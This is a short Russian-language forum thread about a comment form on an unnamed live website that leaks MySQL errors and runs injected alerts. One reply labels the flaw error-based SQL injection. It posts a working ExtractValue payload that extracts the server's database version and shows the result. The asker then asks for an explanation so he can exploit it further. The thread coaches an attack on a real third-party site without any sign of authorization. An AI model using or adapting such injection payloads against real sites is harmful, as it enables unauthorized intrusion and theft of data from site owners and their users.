Уязвимость в отправке комментария

Discussion in 'Песочница' started by 0xd098d0b3d0, 23 Mar 2020.

  1. 0xd098d0b3d0

    0xd098d0b3d0 New Member

    Joined:
    26 Oct 2012
    Messages:
    54
    Likes Received:
    1
    Reputations:
    0
    Если вставить кавычку в комментарий, на сайте
    И отправить, то выдает вот это
    Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/admin/web//public_html/inc/add_comment.php on line 47
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asdf asdfas dfad sf' and site_id='0'' at line 1
    Причем, если вставить alert, то он выдаст его в отдельном окошке.
    Вопрос, можно ли раскрутить, или это просто отображается ошибка
     
    #1 0xd098d0b3d0, 23 Mar 2020
    Last edited: 23 Mar 2020
  2. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    279
    Likes Received:
    117
    Reputations:
    26
    Это error based

    Code:
    fgggggggggggggg' ||(ExtractValue(1,concat(0x3a,(select(version())))))#
    Вверху: XPATH syntax error: ':5.5.60-log'
     
    0xd098d0b3d0 likes this.
  3. 0xd098d0b3d0

    0xd098d0b3d0 New Member

    Joined:
    26 Oct 2012
    Messages:
    54
    Likes Received:
    1
    Reputations:
    0
    Если не сложно, можно небольшую расшифровочку.
    Я так понимаю, что текст до кавычки, это чтобы обойти проверку на длинну комментария, дальше идет ExtractValue, как оно взаимодействует? и зачем решетка в конце строки. Остальное понятно.
     
    #3 0xd098d0b3d0, 23 Mar 2020
    Last edited: 23 Mar 2020
  4. kris990

    kris990 New Member

    Joined:
    8 Oct 2019
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
Loading...